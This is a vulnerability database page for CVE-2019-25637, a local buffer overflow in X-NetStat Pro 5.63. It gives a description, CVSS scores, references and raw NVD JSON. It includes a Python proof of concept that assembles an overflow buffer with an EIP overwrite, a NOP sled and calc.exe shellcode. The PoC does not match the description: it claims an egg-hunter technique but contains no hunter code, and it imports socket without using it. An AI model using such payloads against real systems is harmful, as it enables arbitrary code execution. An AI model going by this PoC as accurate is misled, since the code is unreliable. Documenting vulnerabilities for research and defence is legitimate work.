CVE-2019-25637

Description

X-NetStat Pro 5.63 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by overwriting the EIP register through a 264-byte buffer overflow. Attackers can inject shellcode into memory and use an egg hunter technique to locate and execute the payload when the application processes malicious input through HTTP Client or Rules functionality.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

X-NetStat Pro 5.63

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Buffer overflow PoC for CVE-2019-25637
# Target: X-NetStat Pro 5.63

# Offset to EIP is 264 bytes
offset = 264
# Example EIP overwrite address (JMP ESP)
eip = b"\xaf\x11\x50\x62"
# Egg hunter signature
egg = b"\x90\x90\x90\x90"
# Shellcode (calc.exe example)
shellcode = b"\x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xc2\x77\xff\xd0"

payload = b"A" * offset + eip + b"\x90" * 16 + egg + shellcode

print(f"Payload length: {len(payload)}")
print(repr(payload))
# Send payload via vulnerable HTTP Client or Rules interface

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25637
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25637
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25637/
[4] VulDB https://vuldb.com/cve/CVE-2019-25637
[5] https://freshsoftware.com
[6] https://www.exploit-db.com/exploits/46596
[7] https://www.vulncheck.com/advisories/x-netstat-pro-local-buffer-overflow-via-egghunter

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25637", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:04.593", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "X-NetStat Pro 5.63 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by overwriting the EIP register through a 264-byte buffer overflow. Attackers can inject shellcode into memory and use an egg hunter technique to locate and execute the payload when the application processes malicious input through HTTP Client or Rules functionality."}, {"lang": "es", "value": "X-NetStat Pro 5.63 contiene una vulnerabilidad local de desbordamiento de búfer que permite a atacantes locales ejecutar código arbitrario sobrescribiendo el registro EIP mediante un desbordamiento de búfer de 264 bytes. Los atacantes pueden inyectar shellcode en la memoria y usar una técnica de egg hunter para localizar y ejecutar la carga útil cuando la aplicación procesa una entrada maliciosa a través de la funcionalidad de Cliente HTTP o Reglas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://freshsoftware.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46596", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/x-netstat-pro-local-buffer-overflow-via-egghunter", "source": "[email protected]"}]}}